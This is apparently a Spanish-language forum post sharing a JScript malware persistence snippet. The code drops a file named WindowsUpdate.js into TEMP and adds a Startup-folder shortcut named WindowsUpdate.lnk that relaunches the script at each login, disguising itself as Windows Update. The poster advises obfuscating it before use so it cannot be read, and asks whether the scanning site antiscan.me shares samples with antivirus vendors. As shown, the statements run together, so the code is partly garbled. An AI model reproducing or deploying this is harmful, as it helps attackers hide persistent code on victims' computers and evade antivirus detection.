0 Members and 1 Guest are viewing this topic.
var strr = new ActiveXObject("Scripting.FileSystemObject")var strtwo = WScript.CreateObject("WScript.Shell");var temp = strtwo.ExpandEnvironmentStrings("TEMP");var strtres = strr.CreateTextFile(temp +"WindowsUpdate.js", true);strtres.WriteLine("Ur js code");strtres.Close(); strcinco = strtwo.SpecialFolders("Startup"); var strcuatro = strtwo.CreateShortcut(strcinco + "WindowsUpdate.lnk");strcuatro.TargetPath = WScript.ScriptFullName;strcuatro.Description = "Shortcut WindowsUpdate"strcuatro.WorkingDirectory = temp +"/WindowsUpdate.js";strcuatro.Save();
Se me olvidaba, no se si esta en la seccion correcta, y otra cosa, obfuscar el codigo antes de usarlo, q cualquiera q lo lea sabe q hace.
¿La web antiscan.me comparte muestras con las compañias de AV?